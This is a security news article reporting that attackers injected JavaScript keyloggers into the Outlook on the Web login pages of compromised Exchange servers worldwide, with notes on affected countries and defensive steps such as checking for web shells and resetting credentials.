Unknown threat actors have compromised internet-accessible Microsoft Exchange Servers of government organizations and companies around the world, and have injected the organizations’ Outlook on the Web (OWA) login page with browser-based keyloggers, Positive Technologies researchers have warned.
The keylogging JavaScript code (Source: Positive Technologies)
The initial vector for compromise is unknown
The researchers haven’t been able to pinpoint how the attackers gained access to the compromised servers.
Some of them were vulnerable to a slew of older vulnerabilities – including ProxyLogon (CVE-2021-26855), the three ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), and SMBGhost (CVE-2020-0796) – but others weren’t affected by publicly known vulnerabilities, so the attackers may have used other methods to compromise them.
What the researchers were able to establish is that the login pages have been compromised with either:
- A JavaScript keylogger that grabs the login credentials (and occasionally user cookies) from the authentication form and essentially writes the data to a file on the compromised server which is accessible from the internet, or
- A JavaScript keylogger that exfiltrates the data to a Telegram bot or Discord server, and marks it so that the attackers will known to which organization the stolen credentials belong to.
Damage control
Servers affected by these attackers have been found in Vietnam, Russia, Taiwan, China, Australian, and other countries in Asia, Europe, Africa, and the Middle East.
“The majority of compromised servers were found in government organizations (22 servers belonging to government entities), as well as in the IT, industrial, and logistics companies,” the researchers noted.

Number of victims in different countries (Source: Positive Technologies)
The malicious JavaScript code is imperceptible to those who use the OWA login page to access their email, calendar, etc. via a browser.
But organizations can and should check all login pages and files related to user authentication for potentially malicious code, and check the MS Exchange Server folder for web shells and suspicious pages. (To that end, the researchers have shared a helpful YARA rule.)
Needless to say, if they discover that they have been compromised, organizations should mount an in-depth investigation to pinpoint whether attackers have found their way into other systems and networks, and reset the login credentials of all users who access their account via the compromised page.

Subscribe to our breaking news e-mail alert to never miss out on the latest breaches, vulnerabilities and cybersecurity threats. Subscribe here!

